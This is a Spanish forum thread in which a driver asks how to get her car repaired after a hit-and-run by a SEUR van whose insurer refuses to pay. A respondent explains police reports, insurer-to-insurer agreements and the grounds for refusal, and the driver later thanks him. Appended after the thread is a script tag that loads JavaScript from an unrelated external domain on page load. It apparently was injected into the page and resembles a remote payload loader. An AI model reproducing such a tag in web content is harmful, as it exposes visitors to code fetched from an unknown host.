Sobre accidente que sufrí y el otro conductor se dio a la fuga, le encontraron pero tengo problemas

Hace 14 días sufrí un accidente de trafico. Un furgón de seur invadió mi carril en la vía de dos carriles en la cuidad y se dio a la fuga. En consecuencia de ello tengo lado izquierdo del coche destrozado de tal manera que no se puede ni abrir la puerta del conductor. La policía encontró el culpable de accidente pero su seguro se niega pagar la reparación. ¿Qué posibilidades tengo a que me lo reparen?

1 respuesta

Respuesta

Ud dice que "su seguro (del contrario) se niega pagar la reparación"

Pero no dice por qué se niega ni que es lo que alegan.

Tampoco dice si su aseguradora (la de Ud) ha reclamado a la aseguradora del furgón (que es lo normal), ni si ha obtenido el atestado para fundamentar la reclamación.

En estos casos, lo normal sería que su aseguradora (la de Ud.) obtenga el atestado, y con atestado en mano reclame a la aseguradora del contrario.

Si la aseguradora contraria no atiende la reclamación, la aseguradora de Ud. debería interponer una demanda judicial al propietario, conductor del furgón, como a su aseguradora.

El problema es que yo no sé (y parece ser que Ud. tampoco) qué está haciendo o que ha hecho su aseguradora (la de Ud.) para reclamar a la aseguradora del contrario.

Le sugiero pregunte a su aseguradora que le explique qué han hecho hasta ahora, si han obtenido atestado y reclamado con él, y si reclamarán judicialmente.

Su caso debe tener una explicación, pero parece más bien que Ud. carece de información al respecto, pues no es muy normal que ocurra lo que comenta (tal cual lo comenta).

Es lo único que se me ocurre.

Suerte.

Cris.

Buenos días,en primer lugar le agradezco su respuesta .Hable con mi aseguradora porque me entere en el taller donde lo lleve para que pasen para peritar lo que la otra aseguradora se negó pagar la reparación.En la aseguradora que en mi caso es Alianz me han dicho que han pedido a la policía local todos los documentos relacionados con el accidente.Mi declaración,la del testigo y supongo y del conductor que han encontrado.En entonces puedo arreglar el coche y pedir a mi aseguradora que lo page y luego reclame al contrario o tengo que esperar a que se resuelva todo y entonces poder arreglar el coche ?¿Todos estos tramites son muy largos y yo el coche necesito día a día. Como coche sige en el taller no se que hacer ya les dije que no lo areglen hasta que no se resuelva lo de las aseguradoras porque la reparación es bastante grande y yo no me la puedo permitir pagar.No se si retirar el coche del taller y volver lo llevar cuando este resuelto o dejar lo allí.En caso de que lo retire tendré que pagar los días que estuvo allí ¿aunque sin arreglar¿ Le pido disculpas pero estoy bastante neriviosa de todo este tema y me cuesta explicar me.Gracias Vera

Con la información que ahora me aporta, le podré yo dar también alguna información más, pero para poder prever mejor lo que puede ocurrir, necesitaría algo más de información que no tengo.

De momento... le comento esto:

-En su caso, es muy importante conocer si la reclamación que hace Allianz al contrario se está realizando a través de -convenios-.

Para saberlo casi seguro, necesito tres respuestas:

-Saber qué aseguradora es la contraria.

-Saber si sólo intervinieron dos vehículos.

-Saber si entre los dos vehículos hubo colisión.

Si me contesta a la tres preguntas, sabremos casi con seguridad si la reclamación se realiza a través de dichos convenios.

Suponiendo que así sea (es decir, que la reclamación se formula a través de los convenios), luego cabría saber el motivo que alega la compañía contraria para rehusar la reclamación de Allianz.

Normalmente se rehúsa por tres motivos en dichos convenios:

-Inexistencia de siniestro (es decir, que el contrario niega haber ocasionado el siniestro).

-Inexistencia de Seguro (es decir, que la aseguradora contraria niega tener asegurado el vehículo contrario).

-Versiones contradictorias (es decir, que el contrario aduce que fue Ud. la culpable, y no él).

Sería interesante saber cual de los tres motivos (o cualquier otro) alega la Aseguradora contraria.

Si se aplican dichos convenios, en el supuesto de aceptar la culpa la aseguradora contraria, quien le pagaría la reparación sería Allianz (su aseguradora).

Por tanto, la conclusión NO ES que la aseguradora contraria no quiera pagar la reparación, sino que no quiere aceptar la culpa (por alguno de los motivos expuestos).

En cualquier caso, la solución pasa por conseguir el atestado, y luego, por tener la suerte de que dicho atestado atribuya claramente la culpa al vehículo contrario.

Sólo así su aseguradora Allianz conseguirá (a través de los convenios o fuera de ellos, es decir, amistosamente o judicialmente) que la aseguradora contraria reconozca su culpa (o pague la reparación).

Sobre el tiempo estimado en conseguir el atestado, es muy difícil o imposible saberlo, porque cada ayuntamiento funciona de manera distinta. Hay ayuntamientos que lo proporcionan en tres días, y otros en tres semanas, aunque también podría ser diez días como uno o dos meses (imposible saberlo).

Respecto a la reparación, una vez cerrada la peritación, no creo que el taller le ponga objeción para retirar el vehículo hasta obtener la conformidad (y poder así reparar a cargo de alguna aseguradora, caso de ocurrir).

Piense que la peritación se ha realizado en consenso con dicho taller, por lo que difícilmente podría servir para otro taller (aunque no imposible), por lo que debo suponer que el taller no le pondrá objeción en retirar el vehículo hasta poder reparar.

Pregúntelo al taller. Dígale que en cuanto tenga la conformidad, le llevará el vehículo para que se lo repare.

En el fondo, seguramente le hace un favor al taller por dejarle espacio libre.

En este caso, lo único que puedo sugerirle es que tenga PACIENCIA, y confíe en que Allianz consiga PRONTO el atestado, así como que el atestado LE DÉ A UD. LA RAZÓN, y luego, con el atestado Allianz poder reclamar al contrario AMISTOSAMENTE, y resolverlo así en pocos días.

Eso es lo mejor que le puede pasar.

Si no ocurre eso, todo lo demás sería mucho peor (como por ejemplo, que el atestado no le de a Ud la razón (lo tendría casi perdido); o que la aseguradora contraria o el siniestro no se reclame por convenios (se podría demorar muchos meses); o que Allianz tenga que reclamar judicialmente, en cuyo caso no se resolvería antes de seis meses o un año (a saber, depende de cada juzgado y ciudad).

Se que todo esto le sonará un poco a chino, pero es así como funciona.

Es como una partida de ajedrez, es decir, en función de una cosa, se sabe otra (el problema es saber como está la primera cosa para poder prever la segunda).

Si Ud. tiene el seguro en Allianz, debo presuponer que tiene Ud. un Agente de seguros, y ese agente le debería estar informando cada cierto tiempo de la situación del asunto.

Si no lo está haciendo, pídaselo, porque eso eso también es parte de su trabajo (y no sólo el haberle vendido el seguro).

Suerte.

Cris.

Perdone mi demora y muchas gracias me servido mucho su aclaración.Comprobé todas sus preguntas a las que no Le di respuesta y salio todo bien una vez mas muchas gracias.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>